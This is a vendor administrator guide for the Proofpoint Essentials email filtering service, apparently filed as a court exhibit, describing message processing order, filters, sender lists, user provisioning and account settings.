*Using Proofpoint Essentials* ....................................................................................................................... *11*

**Accessing the User Interface** ............................................................................................................ **11**

Logging In  ..................................................................................................................................... 11

Resetting or changing the administrative password  ................................................................... 11

Using the Homepage  .................................................................................................................... 12

Searching for a Company or Domain  ............................................................................................ 12

Interacting with Lists  .................................................................................................................... 12

**Navigating the Interface**  ................................................................................................................. **12**

Navigation  .................................................................................................................................... 12

Company Settings  ......................................................................................................................... 13

Logs  .............................................................................................................................................. 14

Archive  ......................................................................................................................................... 14

Users & Groups  ............................................................................................................................ 14

Reports  ......................................................................................................................................... 15

**Managing Features and Options** ................................................................................................................. **16**

    Loading Users  ...................................................................................................................................... 16

**Configuration Options** ............................................................................................................................... **18**

    Features  ............................................................................................................................................... 18

    Filters and Sender Lists  ...................................................................................................................... 17

    Domains  ............................................................................................................................................... 24

    URL Defense  ........................................................................................................................................ 27

    Spam  ................................................................................................................................................... 28

    Digests  ................................................................................................................................................ 30

    Notifications  ....................................................................................................................................... 31

    Disclaimer  ........................................................................................................................................... 33

    Social  ................................................................................................................................................... 33

    Access Control  .................................................................................................................................... 34

    **Using Templates** ................................................................................................................................. **34**

**Managing Users & Groups** ........................................................................................................................ **36**

    **Understanding Roles**  ......................................................................................................................... **36**

    **Managing Users**  ................................................................................................................................. **36**

    **Managing Groups**  .............................................................................................................................. **38**

    **Export Users**  ...................................................................................................................................... **39**

    **Configuration Options for Users and Groups**  ................................................................................... **39**

    Users  ................................................................................................................................................... 39

    Groups  ................................................................................................................................................. 41

**Accessing Additional Features** ................................................................................................................. **42**

    **Using Email Logs**  ............................................................................................................................... **42**

    Searching Logs  .................................................................................................................................... 42

    Viewing Search Results  ....................................................................................................................... 43

    Actions  ................................................................................................................................................ 44

    **System Alerts** .................................................................................................................................... **45**

| | |
|---|---|
| Accessing the Emergency Inbox | 45 |
| Reports | 46 |
| **Archive** | **48** |
| Configuring Proofpoint Essentials Archive | 48 |
| Using the Proofpoint Essentials Archive | 49 |
| Who can search the archive? | 49 |
| Viewing Search Results | 50 |
| **Appendix I – Configuring Office 365** | **51** |
| Before you Start | 51 |
| Information needed for configuring Proofpoint Essentials | 51 |
| Information needed for configuring Office 365 | 51 |
| Setup Inbound Mail Flow | 51 |
| Configure Proofpoint Essentials | 51 |
| Configure Office 365 | 52 |
| Setup Outbound Mail Flow | 52 |
| Configure Proofpoint Essentials | 53 |
| Configure Office 365 | 53 |

Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 664 of 726



# *Preface*

## About this Guide

This guide introduces Proofpoint Essentials, provides useful background information about it, and explains how to set it up and use it.

## Intended Audience and Prerequisite Knowledge

This guide is intended for use by personnel who manage the messaging environment and are responsible for configuring and maintaining Proofpoint Essentials.

## Other Sources of Information

This guide covers procedural information for Proofpoint Essentials configuration. For other information, see:

Getting Started Guides: Provides basic information on how to add and configure a new company on Proofpoint Essentials service.



# Introduction to Proofpoint Essentials

*In this chapter, you'll find the following topics:*

- Proofpoint Essentials: Part of the Proofpoint Family
- Proofpoint Essentials Overview
- Message Processing Order
- Best Practices

*NOTE: This guide does not include information about using other Proofpoint products and services. For this information, refer to the documentation for those products and services. For details visit:  www.proofpoint.com*

## Proofpoint Essentials: Part of the Proofpoint Family

Proofpoint offers a comprehensive solution for data protection and governance through an integrated, security-as-a-service platform. Complementing the Proofpoint data protection and security solutions, Proofpoint Essentials is designed specifically for SMEs and backed by Proofpoint's enterprise security technology and infrastructure. Proofpoint Essentials offers the ultimate email security protection for the smaller enterprise.

## Proofpoint Essentials Overview

### Email Filtering Overview

The message filtering layer lets a company, service provider or other organization easily provide real-time spam and virus filtering, attack blocking, and email-traffic monitoring and email archiving across a user deployment of any size. Users receive comprehensive protection against unwanted and malicious email, while administrators can easily tailor service for users' needs and policies.

The service blocks a wide range of email attacks at the connection level, filters spam and viruses, and can approve or block messages based on sender address or domain, origin IP address, attachment size or file type, text content, and more. It does this without requiring you to install additional software or hardware. Instead, users' incoming email is processed at our highly secure and reliable data centers before reaching your server. Within seconds, spam and viruses are separated from legitimate messages.

Legitimate messages are delivered to recipients with minimal delay, while suspicious messages are blocked or sent to the quarantine. Users can review quarantined messages and choose to release them if necessary.

Administrators can arrange users into groups to easily tailor their service while still maintaining control across an entire deployment. They can also give users control over managing their own service. The service includes a number of tools for administrators to monitor, secure, and regulate server connections and email delivery.

### Features and Capabilities

Your service provides a wide range of protection and administrative capabilities. The following topics provide an overview of these components, and are a good introduction to understanding the full power of Proofpoint Essentials.

### Attack Blocking and Connection Protection

Protection against email attacks, where an outbreak of harmful traffic originates from a single server, is provided at our Connection layer. This blocks a wide range of attacks, including Directory Harvest Attacks (DHA) and denial-of-service (DoS) attacks, and it protects against significant spikes in spam or virus activity. Attacks are detected and blocked in real time, at the time the offending IP address attempts to connect with your email server. When an attack or unwanted probe is detected, the source IP address is temporarily blocked, during which time all messages received from that address are bounced back to the sender.

Case 0:20-cv-60416-XXXX   Document 1-7   Entered on FLSD Docket 02/26/2020   Page 9 of 54



## Spam, Virus, and Content Filtering

A message passing through the filtering layer is evaluated by several filters, which include:

- Virus Blocking - Detected viruses are blocked (not delivered to intended users) and logged in the system.
- Spam Filtering - Not only can you set a level for how aggressively to filter spam overall, but users can personally adjust their threshold if needed without the requirement to alter the entire organization.
- Content Filtering - Customized filters allow you to block or allow email based on properties such as size, content, sender, recipient, etc.

## Message Quarantine and Release

Messages caught by a particular filter are processed in a number of ways based on preference. You can take different actions based on the message received. For example, you might opt for a message to be blocked with no quarantine log, or placed in a quarantine where you can later review it and optionally release it to the end-user.

## Scalable / Custom User Management

With the message filtering service, you can easily maintain common services, filter settings, and email policies across your entire user base, while also tailoring service for groups of users or individuals.  For example, you may apply a standard organization filter against anyone being able to receive .Avi movie files, set everyone's spam filtering to moderately aggressive, and provide a master list of approved senders. Users in Sales, however, might want more lenient filtering, and Marketing might need to receive .Avi files after all. These users can be placed in a separate group with different permissions to other users in other groups, thus retaining desired common settings. Each user / group / org can then be tailored as necessary for its users and imported directly from Active Directory.

The platform can also be tailored, as appropriate, for individual users. For example, some users might want to add their own personal allowed and blocked senders or manage received content.

## User Access

It is currently accepted by the vast majority of administrators and email users that optimal service is experienced when users have delegated access to manage their own spam and filter messages, by enabling access to the user interface. Users can log in via any web browser to see what messages are being filtered and why. They can also look for falsely quarantined messages and release any legitimate messages to their own Inbox.

## Email Spooling & Emergency Inbox

Protection against email loss if your email server goes down is provided by all Proofpoint Essentials packages by default. Should your server become unavailable due to a crash or network connectivity problem, Proofpoint Essentials automatically spools incoming traffic to a backup server, where it is stored until communication with your service is established. Emergency Inbox is available at all times. When your server becomes available again, Emergency Inbox unspools the traffic back to your server so it can be delivered.

## Instant Replay

Allow both administrators and users to resend any email filtered by Proofpoint Essentials up to 30 days old.

## Logs and Reports

The Administration Console provides tools that help service administrators monitor email activity and filter effectiveness:

- Reports - The reports page displays a variety of graphs reporting at-a-glance statistics on the number of messages recently delivered, blocked, quarantined, or deferred for delivery.
- Logs - View detailed email activity by searching log files.

## Email Encryption and Data Loss Prevention

Reduce the risk inherent in individuals making security and disclosure policy decisions by creating custom filters to automate enforcement of data security policies for sensitive data. Emails are identified based on industry relevant smart identifiers and dictionaries and the appropriate action is automatically taken – e.g., allowing the information to be sent, blocked or encrypted if appropriate.

Case 0:20-cv-60416-XXXX Document 1-47 Entered on FLSD Docket 02/26/2020 Page 9 of 54



## Service Architecture

As the message filtering layer is hosted, actual detection and filtering of suspicious mail occurs not in your email environment, but at our external data center. This is a robust and secure cloud security platform that sits between your users and the Internet, and is managed by our highly specialized personnel.

To set up the service for an organization, you need to register the mail servers, domains, and users with the service by completing a simple setup wizard. Then you configure their filtering and services. You can do this all from a standard web browser, without having to install or maintain any separate hardware or software.

Once the service is set up, all incoming traffic to users is filtered at the data center according to your configuration—before it reaches your server. Within seconds, heuristics-based anti-spam and virus engines separate spam and viruses from legitimate messages. Legitimate messages are delivered to users without delay, while suspicious mail is diverted to a quarantine area where you or your users can review it.

## Real-Time / Reliable Spam Detection

Messages are filtered before they reach your email server, without being written to an intermediate disk or delayed in a queue. Instead, a pass-through spam detection engine works in-line with SMTP traffic to scan, score, and perform any resulting disposition as messages travel the public Internet.

As a result, the sender receives acknowledgement of successful delivery only after the message is indeed delivered and acknowledged by your email server. If your server becomes unavailable, the message filtering layer returns the message "451 unable to reach the domain name". This 400 class error message indicates a temporary failure to the sending server, which then re-sends the message repeatedly, until either your email server comes back up and the message is delivered, or until the delivery times out (up to fourteen days). In the latter case, the sender receives notice that the delivery failed and can resend the message.

## Message Processing Order

Each message that is processed by Proofpoint Essentials is blocked, delivered or sent to a quarantine based on as specific sequence of steps. The order that these steps are applied to messages ensures that no potentially harmful traffic can reach your servers, while allowing desired traffic to get through in all other cases. For example emails are scanned for viruses before being evaluated by organization filters. This ensures that a message that contained a virus is blocked regardless if the sender appears on an approved sender filter. The message processing order is:

### Connection Layer

Connection Layer provides protection based on the sender's behavior at the IP level:

- When a message first reaches the message filtering service's data center, the service checks to see whether the sender's IP address or domain has already been identified as either malicious or trusted. If so, the service might take action against the message right away.
- Connection Layer monitors incoming traffic for patterns of behavior associated with SMTP attacks, including Email Bombs, Directory Harvest Attacks, Spam Attacks, and Virus Outbreaks. If it detects an attack, it temporarily closes all connections between the offending IP address and your email server. If the message comes from such an IP address, it's bounced, and an SMTP error message is returned to the sender.

### User Validation

The system checks to see if the address is associated with a registered user or aliased to a registered user. If the recipient is a registered user, the message continues to be processed, according to that user's filters and other settings. If the recipient is not registered, the message is either rejected or processed and user created based on SMTP Discovery settings. For more information about SMTP Discovery settings, please refer to Managing Customers / Provisioning a New Customer / Loading Users / SMTP Discovery.

8

Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 10 of
34

## Virus Blocking

Virus blocking scans the message and message attachments for viruses. If a virus is detected, the message is blocked and logged.

## Attachment Defense (If licensed)

Attachment defense scans supported inbound attachments against Proofpoint's attachment reputation service. Messages that contain attachments known to be malicious are blocked and logged.

## Message Size

By default, the maximum message size is 100MB; messages exceeding the maximum message size are bounced.

## Sending Message Limit

In order to protect the reputation of the sender, the organization and the Proofpoint Essentials platform a sending limit of 100 emails per 10 minutes and 500 per day has been implemented. If the limit has been reached, the message is bounced. Proofpoint Essentials recommends using a mail delivery service for higher volume mail delivery such as newsletters or marketing related communications. However, if your organization requires higher outbound volumes for specific senders you can request an exception to be made.

## Custom Filters

Messages are scanned against active custom filters to apply delivery instructions. Filters can be applied to a user, a group of users or the entire organization.

*NOTE: The most specific filter is applied first. For example, a filter that applies to a specified user will be applied before a generic organization wide filter.*

## Sender Lists

A sender list is a list of approved or blocked senders. Entries in the list allow or quarantine specific email addresses and/or domains.

*NOTE: User safe sender entries have precedence over the organization blocked sender entries. For example, if the sender is on an individual user's approved sender list and also on the organization blocked sender list, the message is delivered.*

## Spam Filters

Next, the message reaches the spam filters. These include a general bulk email filter that sets a baseline threshold for filtering all types of junk mail, and filter offsets that can provide more aggressive filtering of junk mail. The messages are evaluated against the threshold set by each user. If the final threshold exceeds the spam trigger score, the message is considered to be spam and then quarantined.

## URL Defense (If Licensed)

All URLs found within inbound messages are re-written (based on configuration options).

## Delivery

After passing through the filtering, the message is delivered to the recipient on your email server.

Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSB Docket 02/26/2020   Page 669 of
726
Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 11 of
34

# Best Practices

Once you have completed the initial company setup we recommend you follow these steps to ensure your organization achieves the most effective protection & filtering from Proofpoint Essentials:

## Add Additional Domains

Ensures that all domains are registered with Proofpoint Essentials.

## Lockdown your Firewall

Some virus and spam senders specifically target mail servers using low-priority DNS MX records or by looking up a server directly using a common naming convention like mail.mydomain.com. To prevent malicious senders bypassing the message filtering service, we highly recommend that you add all of your domains to the service, and then configure your email servers to accept mail only from Proofpoint Essentials data centers.

## Determine Service Requirements

Review the requirements for the organization's users and email policy, and design your organizational deployment strategy. For example, decide which users should have access to the interface, and what additional rules should be created (e.g. Allow and Block lists).

## Enable Features

Review the features available with the package selected and enable important features.

## Configure Default User Settings

Spam thresholds and the quarantine digest can be customized for each organization. In addition, settings can be changed for specific users.

## Load Users

There are multiple ways to load users into the Proofpoint Essentials system.  It is important to choose the right method that suits the organization.

## Add Additional Administrators

You can create additional accounts for administrators and support staff.

## Create an Emergency Plan

You should have a plan in place to follow in the event that you experience a mail flow issue.

- Be sure that you have set up an active and named technical contact with your Proofpoint Essentials reseller for an emergency service.
- If you have access to the support portal, set up a support portal account and also ensure that the correct person is nominated as the technical contact for your organization in the Proofpoint Essentials Account profile page.
- Ensure at least one contact at your supplier has not "Opted Out" of service updates & notifications.
- Set up an internal process for the unlikely event of a service outage.

10

Case 0:20-cv-60416-AMC   Document 3-1   Entered on FLSD Docket 02/26/2020   Page 670 of 726

# Using Proofpoint Essentials

*In this chapter, you'll find the following topics:*

- Accessing the User Interface
- Navigating the Interface

## Accessing the User Interface

The Proofpoint Essentials user interface is the secure web-based user and administrator portal used to manage and configure the Proofpoint Essentials Platform, and administer organizations, users, email archive and email server configurations. The interface provides a secure web interface during the entire session. The console uses SSL to encrypt the email ID and password information. All pages on the interface are HTTPS secured.  Cookies are only used to identify and validate users. The system does not track history in cookies. All cookies expire when the browser is exited.

### Logging In

To access the Administration Console, you must have your organization provisioned on Proofpoint Essentials.

1. Open a web browser and navigate to the appropriate URL (Please see your Getting Started Guide for the URL).
2. Enter your login email address and password.
   - You will receive your login information from your administrator or Proofpoint Essentials reseller once provisioned on the Interface.

The next page you should see is your own organizations Home Profile Page unless you have used incorrect user credentials – in which case you should follow the link to "Forget your Password".

### Resetting or changing the administrative password

1. Click on the Users & Groups tab.
2. Click on your name (alternatively, type your name in the Search panel to locate it).
3. Update both password fields in the profile tab.
4. Click Save.

If you forgot your password, you can click on "Forgot your Password" button on the login page. The next page is a request new password form. Complete this form and a new password will be emailed to you.

Proofpoint Essentials requires that passwords meet the following strength requirements:

*Administrators*

- Passwords must be at least 12 characters in length
- Passwords must start with a letter.
- Passwords must end with a letter.
- Passwords must contain at least one uppercase and lowercase letter.
- Passwords must contain at least one number.
- Passwords must contain at least one special character.

*End-Users*

- Passwords must be at least 8 characters in length.

Case 0:20-cv-60416-AMC   Document 3-1   Entered on FLSB Docket 02/26/2020   Page 671 of
726
Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 13 of
726

## Using the Homepage

After logging in to the interface, you will see the home page, which by default, is your own organization's home profile page. This page can be accessed at any time by navigating to your own organization manually or using the search box at the top of the screen.

The home profile page provides shortcuts to search functionality, an overview of account activity, and links to helpful information.



## Interacting with Lists

In many cases data is returned in a list view such as users, filters, etc. All lists include a maximum result count (default 10). The result set can be temporarily changed by the user. To move through the results of a list simply click on the page numbers that are located immediately below the results.

# Navigating the Interface

## Navigation

Proofpoint Essentials uses a tab style navigation structure to organize content areas. There are three tab levels: primary, secondary and tertiary. Depending on the section you are accessing, additional tabs will appear. The primary navigation (top tabs) include the following functions:

### Company Settings
Used to define and manage an organization's settings.

### Logs
Used to view and access email logs and view detailed message tracking.

Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 14 of
34

## Archive

Used to configure the archive and search archived mail based on user permissions.

## Users & Groups

Used to view and manually manage users and user settings.

## Reports

Used to access reports for mail filtering activity.

# Company Settings

The Company settings tab is used to manage customer configuration options (such as features, domains, digest settings, etc.).

## Profile

Manage the organization's profile and view details about the features enabled by the organization.

## Features

Manage and configure licensed service features.

## Import

Import users into the organization through AD Sync or CSV import.

## Discovery

Manage organization SMTP Discovery settings.

## Filters

Manage custom filters that apply to the organization, groups or end-users.

## Sender Lists

Manage safe and blocked sender entries.

## Domains

Add, update and delete organization domains under management.

## URL Defense

Manage organization URL defense configuration settings.

## Spam

Adjust the Proofpoint Essentials Spam engines' sensitivity and enable additional spam related settings.

## Digests

Manage quarantine digest reports, including content and retention period.

## Notifications

Customize the content of default system notifications such as the welcome email, quarantine digest and password reset request email.

## Disclaimer

Manage organization-wide outbound disclaimers.

Case 0:20-cv-60416-XXXX Document 1-47 Entered on FLSD Docket 02/26/2020 Page 15 of 34

### Branding

Configure and manage branding of the user interface, welcome emails and quarantine digest. Branding is applied to all organizations under your management.

### Social (Advanced and Professional packages only)

Access Social Media Account Protection, powered by Proofpoint's Nexgate division.

### Licensing

Manage organization licenses; change versions and complete trials.

### Access

Manage the privileges of system role accounts.

## Logs

The logs tab displays a second level of navigation to organize the following functions:

### Users

View logs for a specific user.

### Groups

View logs that belong to a specific group.

### Functional Accounts

View logs that belong to a specific functional account (Mail enabled Security Groups, Public Folders, etc.).

### Licensed

View logs for all licensed users.

### Non-Licensed

View logs for all non-licensed users.

## Archive

The Archive tab displays a search interface where a user can search for archived email. In addition, administrators can access a configuration tab to configure the archive service.

## Users & Groups

The Users & Groups tab displays a second level of navigation to organize the following functions:

### Users

View list of provisioned users; Add, delete or modify a user.

### Groups

View list of groups; Add, delete, modify a group; Displays all mail-enabled Security Groups if organization is provisioning users via Active Directory (LDAP) discovery.

### Functional Accounts

View list of mail-enabled objects provisioned via Active Directory (LDAP) Discovery.

Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 16 of 34

## Active Directory Sync

Search Active Directory for list of mail-enable objects to be synced with Proofpoint Essentials.

## SMTP Discovery

View accounts that have been discovered through the SMTP discovery process.

# Reports

The Reports tab displays a second level of navigation to organize the following functions:

## Report Builder

View, print and export a series of mail-flow related reports.

## Schedule List

Schedule selected reports to be delivered regularly by email.

Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSD Docket 02/26/2020 Page 675 of 726

# Managing Features and Options

*In this chapter, you'll find the following topics:*

- Configuration Options
- Using Templates
- Viewing Customers

## Loading Users

Loading Users allows companies to specify a method for provisioning users on the system. The choices are:

### Active Directory (LDAP Discovery)

The preferred method of user synchronization is via LDAP Discovery using Proofpoint Essentials' Active Directory connector module. This allows the Proofpoint Essentials Platform to import:

- Active users (including both primary email address and user aliases)
- Distribution lists
- Security groups (both standard and mail enabled)
- Public folders

*To configure Active Directory connection settings:*

1. Click on the Company Settings tab.
2. Click on the Import tab.
3. Click on the Active Directory tab.
4. Choose the default privileges type for new users.

    *End User: Receive the quarantine digest and can login to the Proofpoint Essentials user interface. Silent User:  Receive the quarantine digest and are not granted access to login to the Proofpoint Essentials user interface.*

5. Enter Active Directory URL.
6. Enter Username.
7. Enter Password.
8. Choose Port.

    *Default port is 389 (LDAP). You can also choose port 636 (LDAP over SSL).*

9. Enter BaseDN.
    For example, DC=mycompany,DC=local
    *The Active Directory configuration is stored in the customer creation process and is executed by the administrator once the customer has been created. Active Directory sync requires the customer to allow Proofpoint Essentials to access the environment over Port 389. Connections are over TLS. Please refer to the Proofpoint Support Knowledge Base for the current list of Proofpoint Essentials IP addresses.*
    *http://support.proofpointessentials.com/index.php?/default_import/Knowledgebase/Article/View/75/11/cu rrent-proofpoint-essentials-data-centre-ip-addresses*

10. Choose What to Sync.
    a. Active Users (Users with mailboxes).
    b. Disabled User Accounts.
    c. Functional Accounts (Mail-enabled objects such as Public Folders).
    d. Security Groups.
    e. Include items hidden from the GAL (Global Address List).
11. Choose How to Sync.
    a. Add (Add new user objects found to Proofpoint Essentials).
    b. Sync Updated Accounts (update details for previously synched accounts).
    c. Delete Removed Accounts (remove accounts from Proofpoint Essentials if no longer present in Active Directory).

16

proofpoint
essentials

       d.    Sync Every 24hrs (Perform sync automatically every 24 hours).

12.   Click Save.

At the end of this process you will have saved your Active Directory Connection details. If you have selected to sync data every 24 hours the system will perform the sync automatically. If not you will need to force the sync process.

*To sync Active Directory:*

1.   Click on the Users & Groups tab.
2.   Click on the Active Directory sync tab.
3.   Click Search.
    *Review the returned results.*
4.   Click Execute.

## CSV Upload

This import option allows companies to provision users by loading a Comma-Separated Values (CSV) file. The file can contain a first name, last name, primary STMP address and aliases for all users.

*To load a CSV file:*

1.   Click on the Company Settings tab.
2.   Click on the Import tab.
3.   Click on the CSV tab.
4.   Choose the type of CSV file you will be loading.
    *Standard CSV: A basic file format that includes first name, last name, primary email addresses and aliases. Postini User CSV: A Postini user export file that contains user details first name, last name, primary STMP address) as well as user allow and block lists.*

    *Postini Alias CSV: A Postini alias export file that contains the alias address, domain, user id and user address. This file can be imported after you have loaded a Postini User CSV*
5.   Choose the default privileges type for new users.
    *End User: Receive the quarantined digest and can login to the Proofpoint Essentials user interface. Silent User:  Receive the quarantine digest and are not granted access to login to the Proofpoint Essentials user interface.*
6.   Click Choose File.
    *Locate file you wish to import.*
7.   Click Upload.
    *You can view an example of the file format you selected to import by clicking on the CSV File Format Instructions.*

Once you upload the file the system will report the number of successful or failed entries imported. If there are errors reported, review the message and repair the file as instructed. Successful addresses will be imported and visible under the Users & Groups tab.

## SMTP Discovery

Another way to provision users to the service is with SMTP Discovery. When enabled, SMTP Discovery allows email to be relayed to non-licensed users. Users become licensed-users when, within a span of 30 days, a specified number of valid messages are received for that unique address OR one valid message has been sent outbound from your email server via the Proofpoint Essentials platform. An administrator can change the SMTP discovery settings.

*To enable or disable SMTP Discovery:*

1.   Click on the Company Settings tab.
2.   Click on the Features tab.
3.   Disable (uncheck) or Enable (check) the SMTP Discovery checkbox.
4.   Click Save.

*To update SMTP Discovery settings:*

1.   Click on the Company Settings tab.
2.   Click on the Discovery tab.
3.   Choose the default privileges type for new users.

Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSD Docket 02/26/2020   Page 677 of 726

*End User: Receive the quarantined digest and can login to the Proofpoint Essentials user interface. Silent User: Receive the quarantine digest and are not granted access to login to the Proofpoint Essentials user interface.*

4.   Select Inbound Detection Threshold.

*The number of clean emails in a 1-month period before the address appears on the SMTP Discovery list.*

5.   Choose how many times you would like to be notified about an address before it expires.

*The named technical contact will receive a weekly notification of discovered addresses. This selection determines the number of notifications, which will be delivered before an address expires. Proofpoint Essentials will not deliver email to an expired address.*

6.   Disable (uncheck) or Enable (check) if expired addresses default to new users.

*This setting may create new users. As a result this option can only be controlled by the Organization Administrator.*

7.   Disable (uncheck) or Enable (check) if aliases should be automatically associated with accounts.

8.   Disable (uncheck) or Enable (check) if users detected via outbound should become licensed. *This setting may create new users. As a result this option can only be controlled by the Organization Administrator.*

9.   Disable (uncheck) or Enable (check) to send out a report on new users.

10.  Disable (uncheck) or Enable (check) to send out a report on new aliases.

11.  Disable (uncheck) or Enable (check) to include the administrator contact in report.

12.  Click Save.

# Configuration Options

**Features**

Features allow administrators to specify which service features should be enabled. By default all features included with the package selected for the company are enabled.

### Instant Replay

The number of days that filtered mail is accessible to users for retrieval (the default is 30 days).

### Proofpoint Essentials Archive (Professional package only) Enables access the Proofpoint
Essentials archive service.

### Outbound Relaying

Allows registered users to relay all outbound email via the Proofpoint Essentials platform.

### Disclaimers

Allows outbound emails to have an email disclaimer appended to outbound emails.

### URL Defense (Business, Advanced and Professional packages only)

Enables URLs found within the message body of an inbound email to be re-written to in order to protect users from accessing known compromised sites.

### Attachment Defense (Business, Advanced and Professional packages only)

Scans supported attachments against Proofpoint attachment reputation service. Emails that contain a known malicious attachment are blocked from delivery.

### Data Loss Prevention (Business, Advanced and Professional packages only)

Allows users to access additional filter objects, such as smart identifiers (credit card numbers, drug codes, etc.) and pre-defined dictionaries, when creating a filter.

18

## SMTP Discovery

Allows emails to be received by and sent from non-registered email addresses for a configurable amount of time before requiring registration.

## Social Media Account Protection (Advanced and Professional packages only)

Social Media Account Protection, powered by Proofpoint's Nexgate division, enables you to prevent account hacks, automatically remove malicious or inappropriate content, prevent unauthorized publishing applications, enforce compliance policy in real-time, and enable intelligent message archival.

## Email Encryption (Advanced and Professional packages only)

Create custom filters that will encrypt an email when specific conditions are met such as an embedded trigger term (e.g., Confidential, Sensitive, Encrypt, etc.) or sensitive data is found.

*To enable or disable features:*

1. Click on the Company Settings tab.
2. Click on the Features tab.
3. Enable (check) or Disable (uncheck) features as necessary.
4. Click Save.

## Filters and Sender Lists

Organizations can create custom filters that apply to inbound or outbound email based on senders and recipients as well as content, attachments, email size, etc. Filters can be applied to the organization, a group, or a user. Sender lists are simplified filters that are designed to accept or block emails from known senders. Sender lists are available for organizations, groups or end-users.

By default, the most specific filters are applied first. For example, a filter that applies to a specific user is applied before a filter that applies to a group of users. Within each filter group (i.e., organization, group, users) processing order can be customized.

Filters and sender lists are applied to messages in the following order:

1. End-user filters; newest first – oldest last (default, can be changed by user)
2. Group filters; newest first – oldest last (default, can be changed by user)
3. Organization filters; newest first – oldest last (default, can be changed by user)
4. End-user allowed sender list; newest first – oldest last (default, can be changed by user)
5. End-user blocked sender list; newest first – oldest last (default, can be changed by user)
6. Group allowed sender list; newest first – oldest last(default, can be changed by user)
7. Group blocked sender list; newest first – oldest last (default, can be changed by user)
8. Organization allowed sender list; newest first – oldest last (default, can be changed by user) 9.    Organization blocked sender list; newest first – oldest last (default, can be changed by user)
10. Organization allowed sender list; domain; newest first – oldest last. 11. Organization blocked sender list; domain; newest first – oldest last.

## Filters

### Administrator Controls

Additional controls are available for administrators to alter standard filter processing behavior as well as control end-user access.

#### Override Previous Destination

Emails are assigned a destination (i.e., allow, quarantine, etc.) by the first filter that is applied to it. For example, if a user has created a filter to allow email from anyone at @domain.com then emails sent from @domain.com will inherit the destination "allow". However, emails continue to be processed by other matching filters where the destination can be overridden. An administrator can

force a new destination by using the "Override Previous Destination" option. For example, if a separate filter is quarantining emails that contain certain attachments types identifies the same email described previously, and it has this setting checked, the email destination would be overridden from "Allow" to "Quarantine".



### Stop Processing Additional Filters

When selected, this option will stop processing any other filters that may otherwise have been applied. This option can be used in conjunction with other level options, such as Override Previous Destination, in order to alter standard filter processing behavior.



### Require Admin Privileges to Release

When selected, this option will ensure users will be unable to release the email either from their quarantine digest email or through their email logs access.

*Note: Administrators are treated as end-users when they receive their quarantine digest. As a result, an administrator will be unable to release an email that has had this restriction applied. The administrator must use the web-based logs to view and release an email.*

### Hide Log

When selected, this option will hide the email from the quarantine digest and email logs for ALL users, including administrators.

### Hide Log from Non-Admin Users

When selected, this option will hide the email from the quarantine digest and email logs for all end-users. Administrators will see these emails.

## Filter Management

Filters can be managed on a page underneath the Company Settings tab. From this location administrators can manage filters that apply to the organization, a group of a user or an individual users. In addition, you can access filters when managing a specific group or a specific user.

*To view current inbound filters:*
1. Click on the Company Settings tab.
2. Click on the Filters tab.

*To view current outbound filters:*
1. Click on the Outbound tab

*To change the filter view:*
1. Click the drop-down and select the appropriate view:
   *All (Default view): A list of all organization, group and user filters.*
   *Organization: A list of all organization filters.*
   *Group: A list of all group filters, grouped by group. Users: A list of all user filters, grouped by user.*

*To adjust the priority of a filter*
You can adjust the priority of a filter only if it applies to the same entity. For example, you can adjust the priority of any organization inbound filters but you cannot prioritize a group filter ahead of an end-user filter.

20



1.   Click on the down arrow next to the filter you wish to lower in priority.
2.   Click on the up arrow next to the filter you wish to increase the priority.

*To add a new filter:*
1.   Click on the Company Settings tab.
2.   Click on the Filters tab.
3.   Click New Filter.
     *A new window will open.*

4.   Enter a name
5.   Choose the direction the filter should be applied. *Inbound: Email sent to your licensed users.*
     *Outbound: Email sent from your licensed users.*
6.   Click Continue.



7.   Choose the scope the filter should be applied.
     *Company: All licensed users that are associated with the company.*
     *Group: A specific group of users. User: A specific user.*
8.   Add condition:
     *Sender Address: Matches the email address that the message in question originated from.*
     *Recipient Address: Matches the email address that the message in question is sent to as a final destination, in other words the To address used by the originating sender.*
     *Email Size (kb):Is greater than can be used to detect an email larger a specified size in order to trigger this rule set. This can be used to block large email or to define which address within an organization can receive email over a specified size.*
     *Client IP Country: Type in the country name and the select the matching selection once it appears. Select more than 1 country by adding multiple values and separating by a comma.*

Case 0:20-cv-60416-AMC    Document 3-1    Entered on FLSD Docket 02/26/2020    Page 681 of
726

*Email Subject: Used to trigger a rule set defined by any word(s) contained within the emails subject line defined in the pattern field.*

*Email Headers: Used to trigger a rule set defined by any word(s) contained within the emails header defined in the pattern field.*

*Email Message Content: Used to trigger a rule set defined by any word(s) contained within the email message content defined in the pattern field.*

*Raw Email: Used to trigger a rule set defined by a block of words contained within the email body defined in the pattern field.*

*Attachment Type: Used to trigger a rule set when an email contains a specified attachment type, including: Windows executable components, installers and other vulnerabilities, other executable components and installers, Office documents and archives, Audio/Visual, Other including PGP encrypted files. Attachment Name: Used to trigger a rule set defined by any word(s) contained within the attachment name defined in the pattern field.*

*Smart Identifier Scan (Available only to Business and Professional package subscribers): Used to identify emails that contain content patterns such as credit card numbers, bank account numbers, etc.*

*Dictionary Scan (Available only to Business and Professional package subscribers): Used to identify emails that contain common terms such as protected health information (i.e., NDC terms), personal information (i.e., SSN), and financial information (i.e., ABA terms).*

9. Choose operator.

   *The operator options will depend on the filter condition selected.*

10. Enter value.



11. If you wish to add another condition, click Add Another Condition.



   *The relationship between each condition specified is AND. For example, if sender address is *@domain.com AND attachment is financial report.*

12. Choose action.

13. *Quarantine: Used for filters where you want to ensure email is not delivered to the intended recipient. Allow: Used for filters where you want to ensure email to be delivered (i.e. allow list).*

   *Nothing: Used for filters where you do not want to influence destination (allow, quarantine) but you want to perform a secondary action (i.e., Alert)*

   *Encrypt: Used to filters where you want to encrypt the email that is caught by the conditions. Encrypt is only available where direction is outbound and scope is the company. Available with Advanced and Professional packages only.*



14. If you wish to add another condition, click Add Another Action.



*This will add a new action control.*

15. *Choose action.*

   *Alert Tech Contact: Will send an alert to the tech contact associated with the site.*

   *Alert Specified Users: Will send an alert to the SMTP addresses specified.*

   *Hide Logs: Will hide the log from the all users including administrators.*

